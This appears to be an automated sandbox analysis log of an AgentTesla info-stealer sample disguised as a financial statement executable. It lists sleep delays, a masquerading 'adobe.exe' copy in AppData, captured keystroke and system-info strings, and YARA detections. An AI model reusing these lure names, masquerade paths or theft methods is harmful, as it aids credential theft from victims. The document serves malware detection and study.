                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599419Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599312Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599092Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598985Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598641Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598516Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598406Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598297Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598188Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598063Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 597938Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 597828Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 597660Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 597172Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596891Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596766Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596546Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596327Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596219Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596109Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596000Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595891Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595766Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595641Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595422Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595310Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595094Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594875Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594766Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594648Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594531Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594422Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594313Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594203Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594092Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 593985Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 593860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599124Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598468Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598338Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597999Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597778Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597452Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597323Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596874Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596654Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596546Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595999Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595388Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595274Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595130Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594341Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599889Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598905Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598466Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598140Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598029Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597921Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597617Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597479Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597076Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596968Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596749Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596640Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596421Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595874Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595546Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594740Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594604Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594315Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594187Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593968Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593640Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593421Jump to behavior
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4484601208.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2240163674.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4484313383.0000000000D47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess created: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe "C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q8<b>[ Program Manager]</b> (31/12/2024 12:01:23)<br>{Win}THbq
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q?<b>[ Program Manager]</b> (31/12/2024 12:01:23)<br>{Win}r{Win}rTHbq
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <html>Time: 01/15/2025 08:20:38<br>User Name: user<br>Computer Name: 724536<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 8.46.123.189<br><hr><b>[ Program Manager]</b> (31/12/2024 12:01:23)<br>{Win}r{Win}r</html>
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q><b>[ Program Manager]</b> (31/12/2024 12:01:23)<br>{Win}r{Win}THbq
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q9<b>[ Program Manager]</b> (31/12/2024 12:01:23)<br>{Win}rTHbq
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q3<b>[ Program Manager]</b> (31/12/2024 12:01:23)<br>
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeQueries volume information: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeQueries volume information: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2241640405.0000000002CCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4487080897.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4487080897.000000000290C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4486848273.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4486848273.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2241640405.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Statement of Account - USD 16,720.00.exe PID: 4828, type: MEMORYSTR
